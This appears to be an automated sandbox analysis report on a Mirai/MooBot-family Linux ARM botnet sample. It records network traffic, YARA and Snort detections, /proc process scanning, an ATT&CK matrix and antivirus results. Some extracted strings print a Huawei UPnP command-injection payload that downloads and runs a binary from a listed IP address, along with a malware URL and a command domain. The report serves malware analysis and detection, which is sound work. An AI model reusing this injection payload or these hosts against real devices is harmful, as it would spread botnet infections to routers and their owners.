          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
          Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
          Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
          Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
          Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
          Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
          Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
          Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
          Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
          Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
          Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41928
          Source: unknownNetwork traffic detected: HTTP traffic on port 41458 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45568 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48642 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41920

          System Summary

          barindex
          Source: skyljnee.arm7-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5436.1.00007f6484017000.00007f6484034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: skyljnee.arm7-20240128-0910.elf PID: 5436, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: skyljnee.arm7-20240128-0910.elfELF static info symbol of initial sample: __gnu_unwind_execute
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurlbusyboxechocatnano
          Source: skyljnee.arm7-20240128-0910.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5436.1.00007f6484017000.00007f6484034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: skyljnee.arm7-20240128-0910.elf PID: 5436, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.troj.linELF@0/1025@1/0
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/5381/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/238/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/239/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/914/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/917/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/14/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/15/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/16/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/17/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/3650/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/18/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/19/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/240/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/3095/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/120/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/241/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/121/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/242/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/122/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/243/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/2/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/123/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/244/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/3/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/124/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/245/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1588/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/125/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/4/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/246/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/126/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/5/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/247/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/127/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/6/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/248/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/128/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/7/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/249/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/129/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/8/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/800/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/9/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1906/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/802/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/803/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/20/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/21/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/22/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/23/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/24/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/25/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/26/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/27/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/28/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/29/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/3420/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1482/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/490/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1480/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/250/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/371/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/130/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/251/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/131/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/252/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/5282/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/132/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/253/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/254/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1238/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/134/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/255/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/256/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/257/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/378/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/3413/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/258/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/259/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/1475/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/936/cmdlineJump to behavior
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5442)File opened: /proc/30/cmdlineJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57636 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 37215
          Source: /tmp/skyljnee.arm7-20240128-0910.elf (PID: 5436)Queries kernel information via 'uname': Jump to behavior
          Source: skyljnee.arm7-20240128-0910.elf, 5436.1.00005579e0fa9000.00005579e10f9000.rw-.sdmpBinary or memory string: yU!/etc/qemu-binfmt/arm
          Source: skyljnee.arm7-20240128-0910.elf, 5436.1.00005579e0fa9000.00005579e10f9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
          Source: skyljnee.arm7-20240128-0910.elf, 5436.1.00007fffcfe25000.00007fffcfe46000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
          Source: skyljnee.arm7-20240128-0910.elf, 5436.1.00007fffcfe25000.00007fffcfe46000.rw-.sdmpBinary or memory string: "x86_64/usr/bin/qemu-arm/tmp/skyljnee.arm7-20240128-0910.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/skyljnee.arm7-20240128-0910.elf

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: skyljnee.arm7-20240128-0910.elf, type: SAMPLE
          Source: Yara matchFile source: 5436.1.00007f6484017000.00007f6484034000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response
          Source: Yara matchFile source: skyljnee.arm7-20240128-0910.elf, type: SAMPLE
          Source: Yara matchFile source: 5436.1.00007f6484017000.00007f6484034000.r-x.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Scripting
          Path Interception1
          Masquerading
          1
          OS Credential Dumping
          11
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1382261 Sample: skyljnee.arm7-20240128-0910.elf Startdate: 28/01/2024 Architecture: LINUX Score: 100 22 haha.skyljne.click 2->22 24 196.138.153.169 Vodafone-EG Egypt 2->24 26 99 other IPs or domains 2->26 28 Snort IDS alert for network traffic 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 4 other signatures 2->34 8 skyljnee.arm7-20240128-0910.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        signatures3 process4 process5 12 skyljnee.arm7-20240128-0910.elf 8->12         started        process6 14 skyljnee.arm7-20240128-0910.elf 12->14         started        16 skyljnee.arm7-20240128-0910.elf 12->16         started        18 skyljnee.arm7-20240128-0910.elf 12->18         started        20 2 other processes 12->20
          SourceDetectionScannerLabelLink
          skyljnee.arm7-20240128-0910.elf61%ReversingLabsLinux.Trojan.Mirai
          skyljnee.arm7-20240128-0910.elf43%VirustotalBrowse
          skyljnee.arm7-20240128-0910.elf100%AviraEXP/ELF.Mirai.Gen.J
          No Antivirus matches
          SourceDetectionScannerLabelLink
          haha.skyljne.click12%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://103.245.236.146/skyljnee.mpsl;100%Avira URL Cloudmalware
          http://103.245.236.146/skyljnee.mips;$100%Avira URL Cloudmalware
          http://103.245.236.146/skyljnee.mips;$16%VirustotalBrowse
          http://103.245.236.146/skyljnee.mpsl;16%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          haha.skyljne.click
          103.245.236.146
          truetrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://103.245.236.146/skyljnee.mpsl;skyljnee.arm7-20240128-0910.elffalse
          • 16%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
